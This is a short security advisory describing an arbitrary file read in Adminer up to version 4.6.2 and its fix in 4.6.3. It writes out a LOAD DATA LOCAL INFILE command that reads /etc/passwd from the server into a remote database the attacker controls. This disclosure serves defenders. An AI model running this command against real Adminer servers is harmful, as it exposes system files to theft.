- Titre : Adminer - Arbitrary file read
- Auteur : @podalirius_
- CVSS : 5.3 (Medium)
- CVSS Vector :
Improper Access Control in Adminer versions <= 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the server by connecting a remote MySQL database to the Adminer.
All Adminer versions up to 4.6.2 (included) are vulnerable:
In order to exploit this vulnerability, an attacker needs to access the login page of Adminer and connect back to a remote MySQL database he controls:
After this, the attacker goes to the “SQL Command” page on the Adminer:
With the following SQL command, the attacker can read a local file on the Adminer server line and load it into his remote database:
LOAD DATA local INFILE '/etc/passwd' INTO TABLE lfr_sink_table fields TERMINATED BY "\n";
Once this is done, the attacker can view the contents of the read file with
SELECT * FROM lfr_sink_table;:
In order to fix this vulnerability you need to update your Adminer to the latest version or a version >= 4.6.3. This vulnerability was fixed by the editor in version 4.6.3.